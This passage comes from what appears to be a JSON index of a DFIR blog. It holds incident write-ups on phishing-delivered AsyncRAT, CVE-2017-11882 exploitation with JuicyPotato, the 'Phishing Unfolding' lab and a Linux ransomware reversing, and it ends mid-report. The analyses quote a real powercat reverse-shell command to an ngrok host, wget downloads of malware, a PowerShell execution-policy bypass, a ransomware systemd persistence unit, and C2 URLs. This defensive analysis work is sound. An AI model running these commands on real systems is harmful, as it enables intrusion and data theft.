macro\n- stage2.js — second-stage implant decrypted from maintools.js - ~dat.tmp — temporary recon output file, deleted after use - dropped .pif — next-stage binary, deleted after execution\nNetwork\n- http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php\n- http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php\nEncryption keys\n- EzZETcSXyKAdF_e5I2i1 — passphrase for maintools.js\n- 2f532d6baec3d0ec7b1f98aed4774843 — key for recon data and payload decryption\nPersistence\n- Scheduled task: TaskManager — display name Windows Task Manager, logon trigger, hidden\nDocument\n- MD5: 49b367ac261a722a7c2bbbc328c32545\n- SHA256: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751\n","date":"March 18, 2026","externalUrl":null,"permalink":"/investigations/cdef-obfuscated/","section":"","summary":"A malicious Word document uses a password-protected AutoOpen macro to drop and execute js script, which decrypts an embedded blob into stage2.js. It is a implant that establishes persistence via a hidden scheduled task, collects system reconnaissance, and beacons to two compromised WordPress C2 servers, downloading and executing a next-stage .pif payload","title":"CDEF-Obfuscated","type":"investigations"},{"content":"","date":"March 18, 2026","externalUrl":null,"permalink":"/tags/doc/","section":"Tags","summary":"","title":"Doc","type":"tags"},{"content":"","date":"March 18, 2026","externalUrl":null,"permalink":"/tags/reverse-engineering/","section":"Tags","summary":"","title":"Reverse Engineering","type":"tags"},{"content":"","date":"March 17, 2026","externalUrl":null,"permalink":"/tags/asyncrat/","section":"Tags","summary":"","title":"AsyncRAT","type":"tags"},{"content":" Alert # 1Alert type: Phishing 2Severity: Medium 3EventID: 257 4Event Time: May 13, 2024, 09:22 AM 5Rule: SOC282 - Phishing Alert - Deceptive Mail Detected 6Source: free@coffeeshooop.com (SMTP: 103.80.134.63) 7Destination: Felix@letsdefend.io 8Subject: Free Coffee Voucher 9Device Action: Allowed Identification # Is the sender spoofed? # The sender domain coffeeshooop.com is a typosquatted domain - the triple o impersonates a legitimate brand. The SMTP address 103.80.134.63 does not belong to any known legitimate infrastructure. SPF, DKIM, and DMARC alignment was checked against the header to confirm spoofing.\nAre there attachments or URLs? # The email contains a \u0026ldquo;Redeem Now\u0026rdquo; button linking to https://files-ld.s3.us-east-2.amazonaws.com/59cbd215-76ea-434d-93ca-4d6aec3bac98-free-coffee.zip and a password-protected attachment free-coffee.zip with password. The password-protected ZIP is a common technique to bypass email gateway scanning.\nWhat does the payload do? # The URL was flagged as malicious by 12/95 vendors on VirusTotal and linked to SILENTBUILDER - a dropper and downloader associated with a Conti subgroup.\nThe ZIP contained Coffee.exe (SHA256: cd903ad2211cf7d166646d75e57fb866000f4a3b870b5ec759929be2fd81d334), flagged by 59/72 vendors as AsyncRAT - a .NET backdoor with capabilities including keylogging, remote shell access, and credential theft. The binary is obfuscated, uses long-sleep anti-sandbox techniques, and detects debug environments. Payload type: RAT / backdoor dropper.\nDid anyone else receive this? # The mail gateway log confirms the email was sent exclusively to Felix@letsdefend.io. No other recipients were identified matching the sender address, subject line, or attachment hash. The campaign appears targeted rather than broad.\nDid the user interact? # Proxy and firewall logs confirm Felix interacted with the email. At 12:59 PM, Felix accessed the malicious URL via chrome.exe, downloading the ZIP archive. At 1:00-1:01 PM, Coffee.exe initiated outbound TCP connections to 37.120.233.226:3451 - confirmed AsyncRAT C2 traffic - with two connections permitted by the firewall. A third connection attempt to 127.0.0.1:3451 was denied, consistent with a loopback environment check performed by the malware.\nTriage Decision # What is the impact level? # Felix clicked the \u0026ldquo;Redeem Now\u0026rdquo; link, downloaded and executed Coffee.exe, and established an active C2 channel to 37.120.233.226:3451. Immediately after the C2 connection, AsyncRAT executed a full host reconnaissance sequence via cmd.exe - collecting system info, hostname, disk layout, user accounts, running services, network configuration, and routing table. The endpoint 172.16.20.151 is fully compromised with an active backdoor and confirmed post-exploitation activity. Escalated to L2.\nContainment # Is the email still reachable? # The phishing email was purged from Felix\u0026rsquo;s mailbox. Sender domain coffeeshooop[.]com and SMTP IP 103.80.134.63 were blocked at the email gateway. Transport rules were created to block future delivery of emails matching extracted IOCs.\nAre endpoints still beaconing? # The C2 IP 37.120.233.226 is hosted on M247 infrastructure (AS9009, Manchester UK) and was flagged as malicious by 12/94 vendors on VirusTotal.\nThe IP was blocked at the firewall and DNS sinkhole. Felix\u0026rsquo;s endpoint 172.16.20.15 was isolated immediately to terminate the active AsyncRAT session.\nPost-exploitation commands confirmed on the endpoint between 13:01:00 and 13:01:30 via cmd.exe: systeminfo, hostname, wmic logicaldisk, net user, tasklist /svc, ipconfig /all, route print. Process Coffee.exe confirmed active in the process list at time of containment.\nEndpoint contained. Case escalated to L2 for full forensic investigation, memory acquisition, and credential reset across all systems accessible from 172.16.20.151.\nIOCs # Domains\n- coffeeshooop[.]com - typosquatted sender domain\nIPs\n- 103.80.134[.]63 - SMTP source address\n- 37.120.233[.]226 - AsyncRAT C2 (M247, AS9009, Manchester UK)\nURLs\n- hxxps://files-ld.s3.us-east-2.amazonaws[.]com/59cbd215-76ea-434d-93ca-4d6aec3bac98-free-coffee.zip - malware distribution\nFiles\n- Coffee.exe - AsyncRAT payload (SHA256: cd903ad2211cf7d166646d75e57fb866000f4a3b870b5ec759929be2fd81d334)\n- free-coffee.zip - password-protected dropper archive\nEmail\n- free@coffeeshooop[.]com - phishing sender\n- Felix@letsdefend.io - targeted recipient\nPorts\n- 3451/TCP - AsyncRAT C2 communication\nMITRE ATT\u0026amp;CK # Tactic Technique ID Initial Access Phishing T1566 Initial Access Spearphishing Link T1566.002 Execution User Execution: Malicious File T1204.002 Defense Evasion Obfuscated Files or Information T1027 Defense Evasion Masquerading T1036 Defense Evasion Time Based Evasion T1497.003 Discovery System Information Discovery T1082 Discovery Account Discovery T1087 Discovery Network Configuration Discovery T1016 Discovery Process Discovery T1057 Credential Access Input Capture: Keylogging T1056.001 Command and Control Application Layer Protocol: Web Protocols T1071.001 Command and Control Non-Standard Port T1571 ","date":"March 17, 2026","externalUrl":null,"permalink":"/blue_team/ld-phishing-alert/","section":"","summary":"A phishing email with a password-protected ZIP delivered AsyncRAT via a SILENTBUILDER dropper. The victim executed the payload, establishing an active C2 channel and triggering full host reconnaissance before containment.","title":"LD-Deceptive Mail Detected","type":"blue_team"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/cve-2017-11882/","section":"Tags","summary":"","title":"CVE-2017-11882","type":"tags"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/dns-tunneling/","section":"Tags","summary":"","title":"DNS Tunneling","type":"tags"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/juicypotato/","section":"Tags","summary":"","title":"JuicyPotato","type":"tags"},{"content":" TL;DR # A phishing email impersonating an invoice notification was delivered to richard@letsdefend.io from the spoofed address accounting@cmail.carleton.ca. The password-protected attachment contained a malicious Office file exploiting CVE-2017-11882 (Microsoft Equation Editor RCE). Upon opening, EQNEDT32.EXE was spawned by excel.exe and performed an outbound GET request to http://andaluciabeach.net/image/network.exe, successfully downloading a payload (network.exe) from 5.135.143.133. The attacker subsequently dropped and executed JuicyPotato.exe from C:/User/Public/ under NT Authority/System, achieving full local privilege escalation on the compromised host. The alert is classified as a True Positive with confirmed endpoint compromise.\nAlert Overview # Field Value EventID 45 Event Time Jan 31, 2021, 03:48 PM Rule SOC114 - Malicious Attachment Detected - Phishing Alert Level Security Analyst SMTP Address 49.234.43.39 Source Address accounting@cmail.carleton.ca Destination Address richard@letsdefend.io E-mail Subject Invoice Device Action Allowed Investigation # An inbound email arrived at richard@letsdefend.io from accounting@cmail.carleton.ca with the subject \u0026ldquo;Invoice\u0026rdquo; and a generic body — \u0026ldquo;Dear customer, Your invoice for the shopping you have done is attached. Regards.\u0026rdquo; The email originated from SMTP address 49.234.43.39 and was delivered without being blocked by the mail gateway.\nThe email carried a password-protected attachment (password: infected) with the filename hash c9ad9506bcccfaa987ff9fc11b91698d. The extracted file was identified as:\n1Filename 44e65a641fb970031c5efed324676b5018803e0a768608d3e186152102615795.xlsx 2MD5 c9ad9506bcccfaa987ff9fc11b91698d 3SHA-1 e788183a2a021f74a21f609e514bb63c4ef2fe49 4SHA-256 44e65a641fb970031c5efed324676b5018803e0a768608d3e186152102615795 5File type MS PowerPoint Presentation (OLE2 Encrypted Structured Storage) 6File size 2.12 MB (2218496 bytes) 7Magika PPT 8TrID Microsoft Encrypted Structured Storage Object (96.9%), Generic OLE2 / Multistream Compound (3%) 9TLSH T145A5334026D14F16D93F52B080DF983653AFCD38FE941E9962063F69B47AA7A33C624D VirusTotal analysis returned 36/62 detections. The file was tagged with cve-2017-11882, exploit, and executes-dropped-file. Multiple vendors classified it as a trojan downloader exploiting the Microsoft Office Equation Editor vulnerability CVE-2017-11882.\nVirusTotal behavior analysis revealed two contacted URLs associated with the sample, both resolving to andaluciabeach.net, with http://andaluciabeach.net/image/network.exe flagged by 12/95 vendors.\nThe endpoint was contained. Review of Richard\u0026rsquo;s proxy logs confirmed that the host 172.16.17.45 successfully performed a GET request to http://andaluciabeach.net/image/network.exe (resolving to 5.135.143.133) at 16:15 on Jan 31, 2021. The request was initiated by EQNEDT32.EXE — the Microsoft Equation Editor process — spawned under excel.exe, confirming successful exploitation of CVE-2017-11882. The device action was recorded as Allowed, meaning the payload was downloaded.\nFollowing the payload download, process logs revealed that JuicyPotato.EXE was executed at 16:20 from C:/User/Public/JuicyPotato.exe under the NT Authority/System context, indicating successful local privilege escalation after the initial compromise.\n1MD5 808502752ca0492aca995e9b620d507b 2Path C:/User/Public/JuicyPotato.exe 3Size 340 KB 4User NT Authority/System 5Time 2021-01-31 16:20 IOCs # Type Value MD5 c9ad9506bcccfaa987ff9fc11b91698d SHA-256 44e65a641fb970031c5efed324676b5018803e0a768608d3e186152102615795 SMTP IP 49.234.43.39 Sender accounting@cmail.carleton.ca Payload URL http://andaluciabeach.net/image/network.exe C2 IP 5.135.143.133 Domain andaluciabeach.net MD5 (tool) 808502752ca0492aca995e9b620d507b (JuicyPotato.exe) Host IP 172.16.17.45 MITRE ATT\u0026amp;CK # Tactic Technique ID Initial Access Phishing: Spearphishing Attachment T1566.001 Execution Exploitation for Client Execution (CVE-2017-11882) T1203 Execution User Execution: Malicious File T1204.002 Command and Control Ingress Tool Transfer T1105 Privilege Escalation Exploitation for Privilege Escalation (JuicyPotato) T1068 Defense Evasion Obfuscated Files or Information (password-protected archive) T1027 ","date":"March 16, 2026","externalUrl":null,"permalink":"/blue_team/ld-malicious-attachment-detected---phishing-alert/","section":"","summary":"Investigation of a phishing email delivering a malicious Excel attachment exploiting CVE-2017-11882, leading to payload download and privilege escalation via JuicyPotato","title":"LD-Malicious Attachment Detected","type":"blue_team"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/powercat/","section":"Tags","summary":"","title":"Powercat","type":"tags"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/powerview/","section":"Tags","summary":"","title":"PowerView","type":"tags"},{"content":" TL;DR # TryHatMe CEO Michael Ascot was targeted in a spear-phishing attack via a fraudulent email from john@hatmakereurope.xyz. The attachment ImportantInvoice-February.zip contained a malicious LNK file that, upon execution, downloaded and ran powercat.ps1 in memory and established a reverse shell to an attacker-controlled ngrok endpoint. With interactive access to the host, the attacker enumerated the Active Directory environment using PowerView, mounted a financial records network share, staged sensitive files locally, and exfiltrated them via DNS tunneling to avoid detection. The incident is a textbook example of a living-off-the-land attack chain combining social engineering, in-memory execution, legitimate tooling abuse, and covert exfiltration over DNS.\nInvestigation # Initial Access # At 07:36:53, CEO Michael Ascot (michael.ascot@tryhatme.com, host win-3450) received an inbound email from john@hatmakereurope.xyz. The sender domain was registered to impersonate a legitimate hat industry business and had no prior relationship with TryHatMe. The email subject read \u0026ldquo;FINAL NOTICE: Overdue Payment - Account Suspension Imminent\u0026rdquo; and used urgency language threatening legal action within 24 hours — a classic fear-based social engineering lure targeting a C-level executive.\nThe attachment was ImportantInvoice-Febrary.zip (SHA-256: 145BB70ABD0CC625F4A7ADD8CFB08982C39C4573470C8B87DB41D755BD2F9EA0). The archive contained a Windows shortcut file invioce.pdf.lnk masquerading as a PDF document. The LNK file embedded the following malicious command:\n1C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u0026#34; -c \u0026#34;IEX(New-Object System.Net.WebClient).DownloadString(\u0026#39;https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\u0026#39;); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell Upon execution, PowerShell downloaded and ran powercat.ps1 directly in memory — a PowerShell implementation of Netcat — and established a reverse shell back to the attacker\u0026rsquo;s ngrok tunnel at 2.tcp.ngrok.io:19282. Because the payload executed entirely in memory, no binary was written to disk at this stage, reducing the likelihood of AV detection. Active Directory Enumeration # At 07:57:14, a temporary script __PSScriptPolicyTest_hnpvwg1v.3mr.ps1 was created on the compromised host, indicating the attacker was probing PowerShell execution policy restrictions. At 08:32:23, PowerView.ps1 was downloaded and executed. PowerView is a well-known PowerShell toolkit for Active Directory reconnaissance, used to enumerate domain users, groups, and trust relationships. SIEM logs confirmed domain enumeration activity originating from win-3450 during this window. Network Share Mounting and File Staging # At 08:01:05, the attacker created a staging directory at C:\\Users\\michael.ascot\\Downloads\\exfiltration. Using net.exe, the network share \\\\FILESRV-01\\SSF-FinancialRecords was mounted as local drive Z:. The attacker then used Robocopy.exe to copy the contents of the share into the local staging directory. The exfiltrated files included InvestorPresentation2023.pptx and ClientPortfolioSummary.xlsx Exfiltration # At 08:01:34, the network share connection was disconnected via net.exe use Z: /delete to remove evidence of the mount. At 08:35:34, the staged files were compressed into exfilt8me.zip. The archive was then base64-encoded and exfiltrated via DNS tunneling — the encoded data was split into 30-character chunks and transmitted as subdomains in a series of nslookup.exe queries launched from PowerShell, effectively bypassing network-layer data loss prevention controls that do not inspect DNS traffic. IOCs # Email\n- Sender domain: hatmakereurope.xyz\n- Attachment: ImportantInvoice-February.zip — 145BB70ABD0CC625F4A7ADD8CFB08982C39C4573470C8B87DB41D755BD2F9EA0\nFiles\n- invoice.pdf.lnk — LNK phishing stager\n- exfilt8me.zip — exfiltration archive — 50E5BF8361DF2442546F21E08B1561273F4CCC610258F622AC1A4B8EBF0A0386\nNetwork\n- raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 — payload delivery\n- 2.tcp.ngrok.io:19282 — C2 reverse shell\nHost\n- Compromised host: win-3450 (michael.ascot@tryhatme.com)\n- Targeted share: \\\\FILESRV-01\\SSF-FinancialRecords\nMITRE ATT\u0026amp;CK # Tactic Technique ID Initial Access Phishing: Spearphishing Attachment T1566.001 Execution User Execution: Malicious File (LNK) T1204.002 Execution Command and Scripting Interpreter: PowerShell T1059.001 Execution System Binary Proxy Execution: Mshta / PowerShell in-memory T1218 Command and Control Application Layer Protocol: Web Protocols (ngrok) T1071.001 Discovery Account Discovery: Domain Account T1087.002 Discovery Domain Trust Discovery (PowerView) T1482 Collection Data from Network Shared Drive T1039 Exfiltration Exfiltration Over Alternative Protocol: DNS T1048.003 Defense Evasion Obfuscated Files or Information (base64 encoding) T1027 Defense Evasion Indicator Removal: Network Share Connection Removal T1070 ","date":"March 16, 2026","externalUrl":null,"permalink":"/blue_team/thm-phishing-unfolding/","section":"","summary":"","title":"THM-Phishing Unfolding","type":"blue_team"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/xlsx/","section":"Tags","summary":"","title":"Xlsx","type":"tags"},{"content":"","date":"March 15, 2026","externalUrl":null,"permalink":"/tags/elf64/","section":"Tags","summary":"","title":"ELF64","type":"tags"},{"content":" Difficulty: Hard OS: Linux Date: 2026-03-15 TL;DR # A Linux ransomware ELF binary (ubuntu-client) was deployed on a development server by an insider threat. The malware XOR-decrypts its strings at runtime using a command-line passphrase, beacons to a DigitalOcean-hosted C2 to retrieve an AES-256-CBC key and IV, recursively exfiltrates and encrypts files under /share with a .24bes extension, then installs a systemd persistence service before deleting itself.\nMemory Analysis # Bash History # Memory analysis of the VMware snapshot (ubuntu-client-Snapshot2.vmem) using Volatility 3 revealed two distinct bash sessions. The insider (PID 636) executed the malicious binary multiple times with the argument xGonnaGiveIt2Ya before deleting it to cover their tracks. A remote attacker (PID 22683) subsequently connected over SSH, re-downloaded the binary from 10.10.0.70 and executed it again. Also show modifications to /etc/ssh/sshd_config.\n1PS C:\\Users\\s\\Desktop\\lockpick3 \u0026gt; vol -f .\\ubuntu-client-Snapshot2.vmem linux.bash.Bash 2Volatility 3 Framework 2.27.0 3Progress: 100.00 Stacking attempts finished 4PID Process CommandTime Command 5...[snip]... 6636 bash 2024-06-03 10:49:32.000000 UTC nano /etc/ssh/sshd_config 7636 bash 2024-06-03 10:50:30.000000 UTC ip a 8636 bash 2024-06-03 10:51:41.000000 UTC nano /etc/ssh/sshd_config 9636 bash 2024-06-03 10:53:22.000000 UTC systemctl restart shh 10636 bash 2024-06-03 10:53:29.000000 UTC sudo 11636 bash 2024-06-03 10:53:29.000000 UTC systemctl restart ssh 12636 bash 2024-06-03 11:21:30.000000 UTC ls 13636 bash 2024-06-03 15:31:03.000000 UTC sudo apt-get install apache2 14636 bash 2024-06-03 15:32:44.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya 15636 bash 2024-06-03 15:36:00.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya 16636 bash 2024-06-03 15:40:24.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya 17636 bash 2024-06-03 15:50:57.000000 UTC rm ubuntu-client 18...[snip]... 1922683 bash 2024-06-03 15:51:25.000000 UTC mdkir /share 2022683 bash 2024-06-03 15:51:25.000000 UTC wget http://10.10.0.70:8123/ubuntu-client 2122683 bash 2024-06-03 15:51:25.000000 UTC wget http://10.10.0.70:8000/ubuntu-client 2222683 bash 2024-06-03 15:51:38.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya 2322683 bash 2024-06-03 15:54:24.000000 UTC sudo apt-get install libcjson-dev 2422683 bash 2024-06-03 15:54:31.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya Initial Analysis # 1.\\ubuntu-client: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, 2interpreter /lib64/ld-linux-x86-64.so.2, 3BuildID[sha1]=595b1b2a3a1451774884ddc5d265e25a44e21574, for GNU/Linux 3.2.0, stripped 4┌─────────────┬────────────────────────────────────────────────────────────────────────────────────┐ 5│ md5 │ a2444b61b65be96fc2e65924dee8febd │ 6│ sha1 │ 071de351a8c1d4df1437c8d68e217a19c719c7af │ 7│ sha256 │ fc519667f03cb94ab7675c0427da42a38abb8675dda4b53cea814499040c0947 │ 8│ os │ linux │ 9│ format │ elf │ 10│ arch │ amd64 │ 11│ path │ C:/Users/s/Desktop/lockpick3/ubuntu-client │ 12└─────────────┴────────────────────────────────────────────────────────────────────────────────────┘ Strings # Static analysis of the binary revealed its core capabilities before any reversing. The malware uses AES-256-CBC likely to encrypt files with extensions .txt .pdf .sql .db .docx .xlsx .pptx .zip .tar .tar.gz, renaming each to .24bes. Communication with the C2 server is handled via libcurl over HTTPS using two endpoints: /connect and /upload/.\n1EVP_EncryptUpdate 2EVP_EncryptInit 3EVP_aes_256_cbc 4EVP_CIPHER_CTX_new 5EVP_EncryptFinal 6EVP_CIPHER_CTX_free 7...[snip]... 8Content-Type: application/json 9/connect 10key 11client_id 12{\u0026#34;passphrase\u0026#34;: \u0026#34;%s\u0026#34;, \u0026#34;hostname\u0026#34;: \u0026#34;%s\u0026#34;} 13.txt 14.pdf 15.sql 16.db 17.docx 18.xlsx 19.pptx 20.zip 21.tar 22.tar.gz 23X-Filename: %s 24/upload/ 25%s.24bes Reversing with IDA # Strings Encryption # All sensitive strings in the binary are XOR-encrypted at rest and decrypted at runtime by mw_xor_decryption() using the passphrase supplied as a command-line argument. The routine iterates over each byte of the encrypted buffer and XORs it against the key with wrap-around (i % key_length).\nThe XOR key used for all string decryption is xGonnaGiveIt2Ya — the passphrase passed as argv[1] at execution time. In hex: 78476f6e6e61476976654974325961. For comfortably, i used the IDA plugin hrt to decrypt data with algorithm Xor with string, key 78476f6e6e61476976654974325961:\nThe full list of strings decrypted at startup:\nAddress Decrypted Value Purpose unk_6020 https://plankton-app-3qigq.ondigitalocean.app/ C2 base URL aShare /share/ Target directory aSebh24 sebh24 Passphrase sent to C2 aUsrBinUbuntuRu /usr/bin/ubuntu-run Persistence binary path aEtcSystemdSyst /etc/systemd/system/ubuntu_running.service Systemd unit path aUnitDescriptio [Unit]\\nDescription=Ubuntu Running\\n... Systemd unit content aSystemctlDaemo systemctl daemon-reload \u0026amp;\u0026amp; systemctl enable ubuntu_running.service \u0026amp;\u0026amp; systemctl start ubuntu_running.service Persistence activation After all strings are decrypted, main executes three functions:\nC2 Communication — Key Retrieval # The function mw_request_and_key_retrieving performs the initial C2 beacon. It builds a JSON payload containing the hardcoded passphrase sebh24 and the victim\u0026rsquo;s hostname, then POSTs it to /connect.\nValue CURLOPT Constant Description 10002 CURLOPT_URL Request URL 10015 CURLOPT_POSTFIELDS POST request body (JSON payload) 20011 CURLOPT_WRITEFUNCTION Callback function for writing the response 10001 CURLOPT_WRITEDATA Buffer where the response is written 10023 CURLOPT_HTTPHEADER HTTP headers (Content-Type: application/json) The payload is constructed by mw_passphrase_and_hostname:\n1{\u0026#34;passphrase\u0026#34;: \u0026#34;sebh24\u0026#34;, \u0026#34;hostname\u0026#34;: \u0026#34;\u0026lt;victim_hostname\u0026gt;\u0026#34;} On success, the C2 responds with a JSON object containing three fields parsed via cJSON:\nField Purpose key AES-256-CBC encryption key iv AES initialisation vector client_id Unique victim tracking identifier Encryption only proceeds if both key and iv are successfully received. If the C2 is unreachable, the malware exits without encrypting any files.\nFile Exfiltration \u0026amp; Encryption # The malware implements a recursive directory traversal starting at /share/, targeting files with the following extensions:\n1s2[0] = \u0026#34;.txt\u0026#34;; s2[1] = \u0026#34;.pdf\u0026#34;; s2[2] = \u0026#34;.sql\u0026#34;; 2s2[3] = \u0026#34;.db\u0026#34;; s2[4] = \u0026#34;.docx\u0026#34;; s2[5] = \u0026#34;.xlsx\u0026#34;; 3s2[6] = \u0026#34;.pptx\u0026#34;; s2[7] = \u0026#34;.zip\u0026#34;; s2[8] = \u0026#34;.tar\u0026#34;; 4s2[9] = \u0026#34;.tar.gz\u0026#34;; Each matching file is exfiltrated to the C2 via an HTTP PUT request before any encryption occurs:\n1PUT https://plankton-app-3qigq.ondigitalocean.app/upload/\u0026lt;client_id\u0026gt; 2X-Filename: \u0026lt;filename\u0026gt; Then the file is encrypted using AES-256-CBC with the key and IV retrieved from C2. The encrypted output is written to \u0026lt;filename\u0026gt;.24bes, the original file is zero-wiped with memset, and then deleted with remove() — preventing recovery via file carving or undelete tools.\nPersistence # After encryption completes, the malware installs itself as a systemd service to survive reboots. It copies the binary to /usr/bin/ubuntu-run, writes the following unit file to /etc/systemd/system/ubuntu_running.service, then runs systemctl daemon-reload \u0026amp;\u0026amp; systemctl enable ubuntu_running.service \u0026amp;\u0026amp; systemctl start ubuntu_running.service.\n1[Unit] 2Description=Ubuntu Running 3After=network.target 4 5[Service] 6ExecStart=/usr/bin/ubuntu-run xGonnaGiveIt2Ya 7Restart=always 8User=root 9 10[Install] 11WantedBy=multi-user.target Note that ExecStart passes xGonnaGiveIt2Ya as the argument — meaning the XOR decryption key is baked into the service definition, allowing the malware to restart and re-encrypt after a reboot or recovery attempt.\nIOCs # Type Value MD5 a2444b61b65be96fc2e65924dee8febd SHA1 071de351a8c1d4df1437c8d68e217a19c719c7af SHA256 fc519667f03cb94ab7675c0427da42a38abb8675dda4b53cea814499040c0947 C2 URL https://plankton-app-3qigq.ondigitalocean.app/ C2 Endpoint /connect — key retrieval C2 Endpoint /upload/\u0026lt;client_id\u0026gt; — file exfiltration Attacker IP 10.10.0.70 Ransomware extension .24bes Persistence binary /usr/bin/ubuntu-run Persistence service /etc/systemd/system/ubuntu_running.service XOR key xGonnaGiveIt2Ya C2 passphrase sebh24 MITRE ATT\u0026amp;CK # Technique ID Description Ingress Tool Transfer T1105 Binary downloaded via wget from 10.10.0.70 Obfuscated Files or Information T1027 XOR-encrypted strings keyed on CLI passphrase Application Layer Protocol: HTTPS T1071.001 C2 communication to DigitalOcean over HTTPS Exfiltration Over C2 Channel T1041 Files PUT to /upload/\u0026lt;client_id\u0026gt; before encryption Data Encrypted for Impact T1486 AES-256-CBC encryption → .24bes extension Indicator Removal: File Deletion T1070.004 Originals zeroed and removed after encryption Create or Modify System Process: Systemd Service T1543.002 ubuntu_running.service for persistence Modify SSH Config T1098 /etc/ssh/sshd_config modified early in session Attack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Start([Attacker 10.10.0.70]):::input --\u003e SSHConfig[Modify /etc/ssh/sshd_config]:::exec subgraph Delivery [Delivery] SSHConfig --\u003e Exec[./ubuntu-client xGonnaGiveIt2Ya]:::exec end subgraph Decryption [String Decryption] Exec --\u003e XOR[XOR decrypt stringskey = xGonnaGiveIt2Ya]:::exec XOR --\u003e Strings[C2 URL /share//usr/bin/ubuntu-runubuntu_running.service]:::exec end subgraph C2 [C2 Registration] Strings --\u003e Connect[POST /connectpassphrase + hostname]:::exec Connect --\u003e KeyRecv[Receive AES keyIV + client_id]:::exec end subgraph Impact [Encryption and Exfiltration] KeyRecv --\u003e Traverse[Recursive traversal/share/]:::exec Traverse --\u003e Exfil[PUT /upload/client_idX-Filename header]:::exec Exfil --\u003e Encrypt[AES-256-CBC encrypt→ filename.24bes]:::exec Encrypt --\u003e Wipe[Zero + remove original]:::exec end subgraph Persistence [Persistence] KeyRecv --\u003e CopyBin[Copy to /usr/bin/ubuntu-run]:::exec CopyBin --\u003e Service[Write ubuntu_running.service]:::exec Service --\u003e Systemctl[systemctl daemon-reloadenable + start]:::exec Systemctl --\u003e Boot((Survives reboot)):::exec end ","date":"March 15, 2026","externalUrl":null,"permalink":"/investigations/htb-lockpick3.0/","section":"","summary":"A ELF64 ransomware binary uses XOR string obfuscation keyed on a CLI passphrase, contacts a DigitalOcean C2 to register and retrieve an AES-256-CBC key and IV, recursively encrypts target files in /share/ renaming them to .24bes, exfiltrates the originals via HTTP PUT, zeroes and removes the source files, and installs a systemd service for persistence.","title":"HTB-Lockpick3.0","type":"investigations"},{"content":"","date":"March 15, 2026","externalUrl":null,"permalink":"/tags/ida/","section":"Tags","summary":"","title":"IDA","type":"tags"},{"content":" TL;DR # The alert is a True Positive. User Tony downloaded payload_1.ps1 (Azorult/Boxter trojan) from an attacker-controlled S3 URL via Chrome, bypassed PowerShell execution policy, and executed the script. The script fetched and ran a second-stage payload (sd2.ps1) in memory from kionagranada.com (161.22.46.148). A second C2 server at 91.236.116.163 was associated with the broader campaign infrastructure. The attack involved two-stage C2, fileless execution, and sandbox evasion.\nAlert Overview # Field Value EventID 238 Event Time Mar 14, 2024, 05:23 PM Rule SOC153 — Suspicious Powershell Script Executed Level Security Analyst Hostname Tony IP Address 172.16.17.206 File Name payload_1.ps1 File Path C:\\Users\\LetsDefend\\Downloads\\payload_1.ps1 File Hash db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0 Trigger Reason Suspicious Powershell Script Executed AV/EDR Action Detected The alert fired at 2024-03-14 17:23 on host Tony with IP 172.16.17.206. The triggered rule was SOC153 — Suspicious PowerShell Script Executed, classified as Malware / Medium severity. The file involved was payload_1.ps1 located at:\n1C:\\Users\\LetsDefend\\Downloads\\payload_1.ps1 2SHA256: db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0 The AV/EDR reported the file as Detected but did not block execution.\nInitial Download # Proxy logs confirmed that user LetsDefend on the same host downloaded the file via Chrome at 2024-03-14 17:22:25 from an Amazon S3 bucket:\n1Source IP: 172.16.17.206:22456 2Destination IP: 3.5.130.147:443 3URL: https://files-ld.s3.us-east-2.amazonaws.com/payload_1.ps1 4Process: chrome.exe 5Device Action: Allowed Approximately 60 seconds later, Sysmon Event ID 1 (Process Create) recorded PowerShell launching the script with an explicit execution policy bypass:\n1EventID: 1 2Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe 3CommandLine: \u0026#34;powershell.exe\u0026#34; \u0026#34;-Command\u0026#34; \u0026#34;if((Get-ExecutionPolicy) -ne \u0026#39;AllSigned\u0026#39;) 4 { Set-ExecutionPolicy -Scope Process Bypass }; 5 \u0026amp; \u0026#39;C:\\Users\\LetsDefend\\Downloads\\payload_1.ps1\\payload_1.ps1\u0026#39;\u0026#34; 6Hash: db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0 7PID: 4315 payload_1.ps1 # Submitting the hash to VirusTotal returned 33/62 vendor detections. The file was identified internally as agent3.ps1. Key findings:\nThreat label: trojan.powershell/boxter Threat categories: trojan, downloader Family labels: powershell, boxter, azorult Behavioral tags: detect-debug-environment, exe-pattern, url-pattern, long-sleeps, checks-network-adapters The presence of detect-debug-environment and long-sleeps tags indicates sandbox evasion logic. The azorult family label identifies this as a credential-stealing infostealer with downloader capabilities.\nC2 Stage 1 # Sysmon Event 